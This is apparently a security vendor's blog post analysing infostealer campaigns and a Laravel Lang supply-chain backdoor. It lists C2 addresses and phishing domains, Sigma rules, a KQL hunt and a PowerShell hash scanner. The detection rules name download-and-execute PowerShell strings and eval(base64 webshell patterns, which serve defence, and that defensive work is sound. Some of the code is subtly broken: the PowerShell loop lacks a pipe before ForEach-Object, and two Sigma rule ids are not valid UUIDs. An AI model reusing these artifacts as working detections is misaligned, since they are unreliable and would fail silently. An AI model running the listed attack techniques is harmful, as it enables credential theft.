Back to Intelligence

TwizAdmin, JINX-0164 & GHOST STADIUM: Multi-Vector Infostealer & Supply Chain Assaults — OTX Pulse Analysis

SA
Security Arsenal Team
May 28, 2026
5 min read

Recent OTX pulses reveal a convergence of sophisticated credential theft operations and supply chain compromises targeting high-value sectors including cryptocurrency, software development, and major event hospitality (FIFA World Cup 2026).

The threat landscape is dominated by the DataBreachPlus group deploying the TwizAdmin suite—a multi-stage operation combining crypto-clipping, BIP-39 seed phrase theft, and ransomware. Simultaneously, JINX-0164 is actively targeting software developers via LinkedIn phishing to deliver Python-based macOS malware (AUDIOFIX, MINIRAT). Parallel to these targeted attacks, mass-scale phishing operations by GHOST STADIUM are leveraging Vidar and Lumma stealers to harvest credentials, while a critical supply chain attack on the Laravel Lang packages has introduced RCE backdoors into development environments. Notably, threat actors are also leveraging blockchain infrastructure (BSC Testnet) for C2 communications, utilizing the "EtherHiding" technique to ensure resilience against takedowns.

Threat Actor / Malware Profile

DataBreachPlus (TwizAdmin)

  • Malware Families: TwizAdmin, crpx0 (Ransomware)
  • Distribution: Malicious FedEx-themed lures targeting Windows and macOS.
  • Capabilities: Clipboard hijacking for 8 cryptocurrency chains, theft of BIP-39 seed phrases, browser credential exfiltration, and ransomware deployment.
  • Infrastructure: FastAPI-based C2 panel located at 103.241.66[.]238:1337 featuring a license key system.

JINX-0164

  • Malware Families: AUDIOFIX (Python Infostealer/RAT), MINIRAT (Go Backdoor)
  • Distribution: LinkedIn social engineering posing as recruiters; NPM trojan supply chain attacks.
  • Capabilities: Steals system information, maintains persistence on macOS, facilitates lateral movement via lightweight Go backdoor.

GHOST STADIUM

  • Malware Families: Vidar, Lumma
  • Distribution: Facebook ads and over 4,300 fraudulent domains impersonating FIFA 2026 World Cup services.
  • Capabilities: Pixel-perfect credential harvesting, phishing-as-a-service (PaaS) ecosystem.

ClearFake / EtherHiding Actors

  • Malware Families: SectopRAT, ACRStealer
  • Technique: "ClickFix" fake browser updates injecting JS into compromised sites. Uses BNB Smart Chain (BSC) testnet smart contracts to store C2 URLs, making the infrastructure immutable.

Laravel Lang Compromise

  • Vector: Compromised community-maintained packages (laravel-lang/lang, etc.) via credential theft.
  • Payload: helpers.php containing obfuscated PHP code facilitating RCE and data exfiltration to flipboxstudio.info.

IOC Analysis

The provided indicators span multiple infrastructure types:

  • Domains/Hostnames: Mostly typosquatting (e.g., fifa.gold, login.teamicrosoft.com) or dedicated delivery networks (fanonlyatn.xyz).
  • File Hashes (SHA256): Prevalence of executables likely representing droppers or payloads for TwizAdmin, AUDIOFIX, and Vidar.
  • IPv4: Specific C2 IPs such as 103.241.66[.]238 and 148.178.22.16.
  • Operationalization: SOC teams should immediately block listed domains and IPs at the perimeter. File hashes should be uploaded to EDR solutions for alerting on execution. The Laravel compromise requires a review of composer.lock files against the malicious package versions.

Detection Engineering

YAML
---
title: Potential TwizAdmin Crypto Clipper Activity
id: 0d7f8b1a-5e3c-4f8a-9b2c-1d3e4f5a6b7c
description: Detects potential execution of TwizAdmin clipper behavior via monitoring for suspicious clipboard access patterns or known malicious process arguments often associated with Java-based RAT builders.
status: experimental
date: 2026/05/29
author: Security Arsenal Research
references:
    - https://otx.alienvault.com/pulse/64271f3210715648666b4566
tags:
    - attack.credential_access
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'BIP39'
            - 'seed phrase'
            - 'mnemonic'
            - 'clipper'
    condition: selection
falsepositives:
    - Legitimate cryptocurrency wallet management software
level: high
---
title: Suspicious PHP Backdoor Execution (Laravel Lang Compromise)
id: 1e8g9h2i-6j4k-5l9m-0n3o-4p5q6r7s8t9u
description: Detects the execution of PHP scripts with base64 encoded arguments or common webshell patterns associated with the Laravel Lang helpers.php backdoor.
status: experimental
date: 2026/05/29
author: Security Arsenal Research
references:
    - https://otx.alienvault.com/pulse/64271f3210715648666b4570
tags:
    - attack.persistence
    - attack.web_shell
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - '\php.exe'
            - '\php-cgi.exe'
    selection_cli:
        CommandLine|contains:
            - 'base64_decode'
            - 'eval(base64'
            - 'helpers.php'
    condition: all of selection_*
falsepositives:
    - Legitimate developer debugging activity
level: critical
---
title: Infostealer PowerShell Payload (Vidar/Lumma/Generic)
id: 2f9g0h3j-7k5l-6m0n-1o4p-5q6r7s8t9u0v
description: Detects PowerShell commands often used by stealers like Vidar and Lumma to download payloads or exfiltrate browser data.
status: experimental
date: 2026/05/29
author: Security Arsenal Research
references:
    - https://otx.alienvault.com/pulse/64271f3210715648666b4568
tags:
    - attack.execution
    - attack.command_and_control
logsource:
    category: process_creation
    product: windows
detection:
    selection_pwsh:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_suspicious:
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'IEX'
            - 'DownloadString'
            - 'http://89.36.224.5' # Specific IOCs from JINX-0164
            - 'fanonlyatn.xyz'
    condition: all of selection_*
falsepositives:
    - System administration scripts
level: medium


kql
// Hunt for network connections to known malicious infrastructure from pulses
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in~ (
    "fanonlyatn.xyz", 
    "fifa.gold", "fifa.black", "fifa.tax", "fifaweb.com", "fifa.red", "fifa.fund", "fifa-com.shop",
    "driver-updater.net", 
    "live.ong", 
    "flipboxstudio.info",
    "afraid.veloitall.cfd"
    )
    or RemoteIP in ("103.241.66.238", "148.178.22.16", "89.36.224.5")
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort
| summarize count() by RemoteUrl, RemoteIP, DeviceName
| order by count_ desc


powershell
# IOC Hunt Script for TwizAdmin and Laravel Backdoors
$MaliciousHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
    "74ab520e94b2f3b8915ec7b47abab7a2d7e9759add5aa195af7edf0ffa5b4150",
    "9d9783f57fd543043e0792d125831883259c823a5eaa69211e5254db4db4eaec",
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"
)

$SuspiciousPaths = @(
    "C:\Users\*\AppData\Roaming\Microsoft\Crypto",
    "C:\xampp\htdocs\laravel-lang\lang\helpers.php" 
)

Write-Host "Checking for known malicious file hashes..."
foreach ($hash in $MaliciousHashes) {
    $files = Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
             Where-Object { $_.Length -gt 0 } 
             ForEach-Object { 
                $fileHash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
                if ($fileHash -eq $hash) { $_.FullName }
             }
    if ($files) { Write-Host "[ALERT] Malicious file found: $files" -ForegroundColor Red }
}

Write-Host "Checking for suspicious file paths related to Laravel/TwizAdmin..."
foreach ($pathPattern in $SuspiciousPaths) {
    $resolvedPaths = Resolve-Path $pathPattern -ErrorAction SilentlyContinue
    if ($resolvedPaths) {
        Write-Host "[WARN] Suspicious path detected: $resolvedPaths" -ForegroundColor Yellow
    }
}

Response Priorities

Immediate (0-24h):

  • Block all domains and IPs listed in the IOC Analysis section at the firewall and proxy level.
  • Scan all endpoints for the specific SHA256 hashes provided in the TwizAdmin and JINX-0164 pulses.
  • Audit web servers for the presence of helpers.php in laravel-lang directories and remove any instances immediately.

24-48h:

  • Initiate credential resets for developers who may have interacted with the compromised Laravel packages or clicked on LinkedIn recruitment lures.
  • Review browser history and DNS logs for connections to fifa.* domains or flipboxstudio.info to identify potential phishing victims.

1 Week:

  • Implement strict allow-listing for PHP execution and Composer package updates.
  • Enforce MFA verification for all developer accounts and cryptocurrency wallets.
  • Conduct a supply chain audit of all third-party libraries currently in use.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsinfostealersupply-chaincryptocurrencytwizadminlaravel

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action